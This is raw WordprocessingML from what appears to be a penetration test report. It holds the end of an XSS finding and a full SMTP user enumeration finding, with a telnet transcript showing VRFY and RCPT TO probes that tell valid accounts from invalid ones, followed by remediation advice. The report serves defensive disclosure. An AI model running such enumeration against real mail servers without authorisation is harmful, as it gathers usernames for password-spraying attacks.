      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
      <w:commentRangeEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:commentReference w:id="23"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E04FD1" w14:textId="0A7451A3" w:rsidR="00335D96" w:rsidRDefault="00244E22" w:rsidP="00244E22">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00244E22">
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00244E22">
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r>
        <w:t>ross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D349FE8" w14:textId="4BCB87F9" w:rsidR="00E07CD2" w:rsidRDefault="00E07CD2" w:rsidP="00E07CD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/xss/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFCD784" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22"/>
    <w:p w14:paraId="7EB28EE6" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22"/>
    <w:p w14:paraId="47A64B60" w14:textId="32E41462" w:rsidR="00C0551F" w:rsidRDefault="00C0551F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3BA88A" w14:textId="5AFAA699" w:rsidR="00C0551F" w:rsidRPr="001215EC" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SMTP User Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD8B2D" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRPr="006F5E52" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">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C0551F" w:rsidRPr="005264D0" w14:paraId="2921F387"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B911D69" w14:textId="59CF9184" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>SMTP User Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C0551F" w:rsidRPr="005264D0" w14:paraId="68BF0C6A"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EA8B00"/>
          </w:tcPr>
          <w:p w14:paraId="1688463B" w14:textId="2949C3AA" w:rsidR="00C0551F" w:rsidRPr="00DA733E" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA733E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve"> Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD393"/>
          </w:tcPr>
          <w:p w14:paraId="04FB0427" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD393"/>
          </w:tcPr>
          <w:p w14:paraId="2CDB00EB" w14:textId="03127A7A" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C0551F" w:rsidRPr="005264D0" w14:paraId="2DC83E2B"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EA8B00"/>
          </w:tcPr>
          <w:p w14:paraId="044C1E92" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="773D7544" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BC8B4AE" w14:textId="2FDAAEA8" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C0551F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C0551F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:A</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C0551F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7605D1FB" w14:textId="5CD61A84" w:rsidR="00C0551F" w:rsidRPr="00DA733E" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:commentRangeStart w:id="24"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeEnd w:id="24"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="24"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="58558CA2" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650105D4" w14:textId="4C0AEC70" w:rsidR="00C0551F" w:rsidRPr="003C17E2" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>172.16.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21A799" w14:textId="06B51BBE" w:rsidR="00C0551F" w:rsidRPr="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0551F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0551F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Port 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55606894" w14:textId="76699262" w:rsidR="00C0551F" w:rsidRPr="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0551F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D92D23" w14:textId="2F78EFC4" w:rsidR="00C0551F" w:rsidRPr="000A4289" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:r>
        <w:t>The assessment team was able to enumerate usernames on the SMTP service</w:t>
      </w:r>
      <w:r w:rsidR="00CA4C6E">
        <w:t xml:space="preserve"> based on the difference in responses by the service. The application responded to valid usernames with a 250 or 252 response, while it responded to invalid usernames with a 550 response. The below terminal output demonstrates how the assessment team enumerated a valid username.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C0551F" w14:paraId="46D5579E" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5F6E3E8F" w14:textId="5341CA31" w:rsidR="00C0551F" w:rsidRDefault="00CA4C6E" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C0551F">
              <w:t>proxychains</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00C0551F">
              <w:t xml:space="preserve"> telnet 172.16.1.2 25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D4EB4C" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Escape</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> character is '^]'.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="545379E8" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">220 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>gobvesclient.gobvesbank</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ESMTP Postfix (Ubuntu)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21789512" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>EHLO all</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="095FF996" w14:textId="4A0900E7" w:rsidR="00C0551F" w:rsidRDefault="00CA4C6E" w:rsidP="00CA4C6E">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41F69FF9" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>MAIL FROM: me</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D63DAF1" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>250 2.1.0 Ok</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AD30DF7" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RCPT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>TO:test</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3DCBA255" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">550 5.1.1 &lt;test&gt;: Recipient address rejected: User unknown in local recipient </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>table</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="481F7C68" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RCPT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>TO:gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7AF48056" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>550 5.1.1 &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">&gt;: Recipient address rejected: User unknown in local recipient </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>table</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="10EC6C4A" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00CA4C6E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>VRFY root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59030EE6" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00CA4C6E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>252 2.0.0 root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="655F7A59" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">VRFY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>blaugh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1AE59EA5" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>550 5.1.1 &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>blaugh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">&gt;: Recipient address rejected: User unknown in local recipient </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>table</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7603F282" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00CA4C6E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RCPT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>TO:root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="107B6BE0" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00CA4C6E">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>250 2.1.5 Ok</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E63395" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RCPT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>TO:test</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3F55D8B6" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">550 5.1.1 &lt;test&gt;: Recipient address rejected: User unknown in local recipient </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>table</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5B678213" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RCPT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>TO:admin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2F28AF2F" w14:textId="2CF60971" w:rsidR="00C0551F" w:rsidRPr="00B40A5B" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>550 5.1.1 &lt;admin&gt;: Recipient address rejected: User unknown in local recipient table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="018F356C" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E012EB9" w14:textId="66D40C37" w:rsidR="00C0551F" w:rsidRPr="00A154A9" w:rsidRDefault="00CA4C6E" w:rsidP="00C0551F">
      <w:r>
        <w:t>An attacker could leverage this vulnerability to obtain a list of valid usernames for use in later attacks such as password spraying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6A5BC8" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505921D" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="25"/>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C00A1" w14:textId="733C4B2F" w:rsidR="00C0551F" w:rsidRPr="00244E22" w:rsidRDefault="00250115" w:rsidP="00250115">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">Randomize </w:t>
      </w:r>
      <w:r w:rsidRPr="00250115">
        <w:t xml:space="preserve"> error</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00250115">
        <w:t xml:space="preserve"> messages so that attackers cannot use them to determine whether or not a particular email address exists on the mail server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F10351" w14:textId="6FE59276" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
      <w:commentRangeEnd w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:commentReference w:id="25"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76192AAA" w14:textId="0B0154EC" w:rsidR="00C0551F" w:rsidRDefault="00250115" w:rsidP="00C0551F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux – SMTP User Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5961C975" w14:textId="5A0BA853" w:rsidR="00250115" w:rsidRDefault="00250115" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.kali.org/tools/smtp-user-enum/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEB250" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22"/>
    <w:p w14:paraId="7CE1B642" w14:textId="77777777" w:rsidR="00244E22" w:rsidRPr="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22"/>
    <w:p w14:paraId="52AD1237" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F0E43" w14:textId="0BBF11E4" w:rsidR="00542A1D" w:rsidRPr="00542A1D" w:rsidRDefault="00542A1D" w:rsidP="00542A1D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
